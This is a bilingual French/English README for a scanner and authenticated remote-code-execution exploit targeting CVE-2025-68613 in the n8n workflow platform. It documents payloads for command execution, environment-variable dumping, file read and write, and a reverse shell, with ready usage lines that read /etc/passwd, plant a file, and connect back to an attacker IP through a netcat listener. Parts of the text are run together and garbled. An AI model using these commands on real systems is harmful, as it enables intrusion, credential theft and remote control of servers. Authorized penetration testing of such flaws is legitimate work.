Exploit RCE authentifié et scanner de vulnérabilité pour CVE-2025-68613 dans n8n. Prend en charge l'exécution de commandes, les opérations sur fichiers et les charges utiles de reverse shell pour des tests de sécurité autorisés.
Cette boîte à outils fournit des scripts de scan et un PoC d’exploitation pour la vulnérabilité critique CVE-2025-68613 affectant la plateforme d’automatisation de workflows n8n.
This repository provides scanner and exploit PoC scripts for the critical CVE-2025-68613 vulnerability affecting n8n Workflow Automation Platform.
Cet outil est UNIQUEMENT destiné aux tests de sécurité AUTORISÉS et LÉGAUX. Son utilisation sur un système sans autorisation du propriétaire est interdite.
This tool is ONLY for authorized and legal security testing. Unauthorized usage is illegal and prohibited.
0.211.0 – 1.120.31.121.01.120.4+1.121.1+1.122.0+.
├── tot-scanner-2025-68613.py # Scanner de vulnérabilité (SANS exploitation)
├── tot-exploit-2025-68613.py # PoC d’exploitation RCE authentifié
├── requirements.txt
└── README.md
Le scanner est utilisé pour :
The scanner:
Le scanner vérifie les points de terminaison suivants :
//rest/settings/healthz/api/v1/healthPaquets requis :
Contenu du fichier requirements.txt :
requests>=2.28.0
Required packages:
requirements.txt content:
requests>=2.28.0
pip install -r requirements.txt
python3 tot-scanner-2025-68613.py -u http://target.com:5678
python3 tot-scanner-2025-68613.py -u http://target.com:5678 --json
{
"target": "http://target.com:5678",
"detected": true,
"version": "1.121.0",
"vulnerable": true,
"status": "vulnerable",
"cve": "CVE-2025-68613"
}
| Code | Signification |
|---|---|
| 0 | Non vulnérable |
| 1 | Version inconnue |
| 2 | Vulnérable |
Cet exploit nécessite des identifiants n8n valides.
L’accès authentifié est OBLIGATOIRE.
L’exploitation fonctionne en :
Set| Argument | Requis | Description |
|---|---|---|
-u / --url | ✅ | URL cible n8n |
-e / --email | ✅ | Email du compte n8n |
-p / --password | ✅ | Mot de passe du compte n8n |
--payload | ✅ | Type de charge utile |
--command | ❌ | Commande OS (cmd) |
--file | ❌ | Chemin de fichier (read/write) |
--content | ❌ | Contenu du fichier (write) |
--lhost | ❌ | IP de l’attaquant (revshell) |
--lport | ❌ | Port de l’attaquant (revshell) |
--verify-ssl | ❌ | Vérifier le certificat SSL |
| Charge utile | Fonction |
|---|---|
info | Informations système |
cmd | Exécution de commande |
env | Vidage des variables d’environnement |
read | Lecture de fichier |
write | Écriture de fichier |
revshell | Shell inversé |

python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload info
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload cmd --command "id"
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload read --file /etc/passwd
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload write --file /tmp/pwned.txt --content "owned"
nc -lvnp 4444
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444
/rest/*Ce projet est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.
L’auteur n’est pas responsable d’une mauvaise utilisation.
n8n
cve
cve-2025-68613
rce
expression-injection
security
pentest
red-team
blue-team
python
Restez légal. Restez éthique.